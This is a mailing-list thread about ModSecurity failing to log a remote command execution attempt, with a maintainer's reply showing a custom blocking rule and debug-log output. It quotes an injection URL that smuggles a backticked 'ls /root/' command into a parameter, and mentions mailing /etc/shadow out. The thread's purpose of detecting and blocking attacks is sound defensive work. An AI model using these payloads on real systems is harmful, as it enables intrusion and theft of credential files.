On Fri, Aug 16, 2013 at 3:18 AM, rewt rewt <rewt@linux-elite.org> wrote:
I have a big issue with modsecurity detecting a simple Remote Command Execution.
My WAF config is Modsecurity 2.7.1 with core rules based on scoring but however i don t have any logging for that request:

GET http://OBFUSCATED/application.pl?action=deleteaccount&username=%60ls%20/root/%20%3E%20/tmp/root%60&redirectionemail= HTTP/1.1

(also work for mail my@email.Com < /etc/shadow)

It is simple not detected in logs!!!
I clearly don t understand why... it should be triggered by the "common attack" rules of the CRS activated rules in my opinion.

The CRS does detect that attack, as seen here:
Can you increast you debug log level to 9 and send me your debug log privately?

I tried this without sucess:
SecRule ARGS "(;|\||\`)" "phase:3,t:none,log,deny,id:5000148"

As an aside, its normally a good idea to stop an attack at the first point possible. For the ARGS collection that is in phase 2. Having said your rule above works as expected:

#curl localhost/test?abc=%3B

# less /opt/modsecurity/var/log/debug.log
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][5] Rule 7f3cf08e3e90: SecRule "ARGS" "@rx (;|\\||\\`)" "phase:3,auditlog,t:none,log,deny,id:5000148"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Transformation completed in 0 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Executing operator "rx" with param "(;|\\||\\`)" against ARGS:abc.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Target value: ";"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][6] Ignoring regex captures since "capture" action is not enabled.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Operator completed in 34 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Rule returned 1.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Match, intercepted -> returning.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][1] Access denied with code 403 (phase 3). Pattern match "(;|\\||\\`)" at ARGS:abc. [file "/opt/modsecurity/etc/rules.conf"] [line "9"] [id "5000148"]

 - Josh

SecRule ARGS ";" "phase:3,t:none,log,deny,id:5000148"
(i tried it with phase 2 or 1 attack still succeed)

Another interesting option could be to increase the score only for that virtual host but i don t think it would be helpful as it is not detected.

Any help would be much appreciated !

Many thanks

David R

Get 100% visibility into Java/.NET code with AppDynamics Lite!
It's a free troubleshooting tool designed for production.
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
mod-security-users mailing list
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs: